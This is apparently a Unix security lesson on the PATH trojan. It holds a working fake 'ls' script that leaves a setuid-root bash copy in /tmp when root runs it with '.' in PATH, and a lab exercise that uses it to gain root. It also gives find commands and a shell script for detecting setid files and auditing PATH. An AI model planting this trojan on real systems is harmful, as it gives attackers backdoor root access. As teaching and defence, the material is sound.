Assume root's PATH is set as follows: PATH=.:$PATH
The attacker places the script below in /tmp and names it ls.
When root changes into /tmp and runs ls, the script creates a back door for the attacker: it leaves a setuid-root copy of bash in /tmp/.sh and then removes itself.
When a user later executes
/tmp/.sh -p
he becomes root.
    #!/bin/sh
    who=`whoami`
    # check if I am the root:
    if [ "$who" = "root" ]
    then
        # leave a setuid-root shell behind and remove the trojan itself
        cp /bin/bash .sh
        chmod 4755 .sh
        /bin/rm ls
    fi
    # behave like the real ls so nothing looks wrong
    /bin/ls $*
This trojan can be found with the find command (the -perm /mode form, "any of these bits set", is GNU find syntax):
find /tmp -type f -perm /u=s,g=s -ls
or
find /tmp -type f -perm /6000 -ls
Note that this search covers only /tmp; run the same check over every world-writable directory, and remove the root cause, "." in root's PATH, rather than relying on the search alone.
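As an added example (not from these notes), the following POSIX sh script carries two defensive checks: audit_path() flags PATH entries that resolve to the current directory ("." or an empty entry) or to any other relative directory, which is the root cause of the trojan above, and find_setid_files() generalizes the find command above to any list of directories using the portable -perm -mode form. The directories /tmp and /var/tmp in the stand-alone run at the end are assumed; adjust them to your own world-writable locations.

```shell
#!/bin/sh
# Added example, not from the original notes: two defensive checks for the
# PATH trojan. audit_path() flags PATH entries that make the shell look in
# the current directory ("." or an empty entry) or in any other relative
# directory; find_setid_files() lists setuid/setgid regular files under the
# given directories, which is exactly what the trojan leaves behind.

# Return 0 if every entry of the PATH string in $1 is an absolute directory,
# 1 otherwise, printing one line per offending entry.
audit_path() {
    _path="$1"
    _bad=0
    # An empty PATH is searched as the current directory, so it is not clean.
    if [ -z "$_path" ]; then
        echo "PATH is empty (shell searches the current directory)"
        return 1
    fi
    _rest="$_path"
    while :; do
        # Peel off the entry before the first ':'. An empty string between two
        # colons, before a leading colon or after a trailing one is also an entry.
        case "$_rest" in
            *:*) _entry="${_rest%%:*}"; _rest="${_rest#*:}"; _more=1 ;;
            *)   _entry="$_rest"; _more=0 ;;
        esac
        case "$_entry" in
            "") echo "empty entry (current directory)"; _bad=1 ;;
            .)  echo "'.' entry (current directory)"; _bad=1 ;;
            /*) ;;   # absolute path: acceptable for this check
            *)  echo "relative entry: $_entry"; _bad=1 ;;
        esac
        [ "$_more" -eq 1 ] || break
    done
    return "$_bad"
}

# Print every regular file under the given directories that has the setuid
# or setgid bit. "-perm -4000" (all of these bits set) is POSIX, unlike the
# GNU-only "-perm /6000" form used in the notes; -xdev keeps the search on
# one filesystem so a scan of / does not wander into /proc or network mounts.
find_setid_files() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Stand-alone run: audit the current PATH and scan the shared temp directories
# (assumed locations; add any other world-writable directory on your system).
if audit_path "$PATH"; then
    echo "PATH contains only absolute entries"
fi
find_setid_files /tmp /var/tmp
```

Pipe the output of find_setid_files into `xargs ls -l` (or add `-exec ls -l {} +` to the find) when you want the same detail as the `-ls` flag in the notes; every setuid or setgid file reported from a temp directory should be investigated, since no legitimate package installs such files there.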
Very often, trojans arrive bundled with new software.
Verify the developers' signatures using checksums or GPG/PGP tools before installing.
Exercise
Create the script as an ordinary user in /tmp and run chmod 755 ls; then log in as the superuser and
modify your PATH variable to include ".":
export PATH=.:$PATH
cd /tmp
ls
exit
Log in as the user again, then
cd /tmp
/tmp/.sh -p
and see what happens.
When you finish the exercise, DON'T FORGET to remove /tmp/.sh !!!